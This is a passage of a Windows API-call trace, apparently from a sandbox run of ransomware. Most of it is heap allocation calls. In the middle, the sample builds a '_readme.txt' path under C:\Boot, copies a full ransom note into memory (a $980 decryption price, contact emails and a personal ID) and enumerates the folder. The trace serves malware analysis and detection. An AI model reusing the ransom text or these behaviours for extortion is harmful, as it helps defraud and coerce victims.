hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.422] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0175.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.423] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0175.423] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.423] PathFindFileNameW (pszPath="") returned="" [0175.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.423] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.424] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0175.424] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0175.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.424] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.424] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0175.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.424] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0175.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0175.425] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.425] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0175.425] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0175.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0175.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.427] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*" (normalized: "c:\\boot\\zh-tw\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.428] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.428] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0175.428] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0175.428] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0175.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0175.429] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0175.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0175.433] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0175.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0175.437] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0175.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0175.439] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.446] RtlAllocateHeap 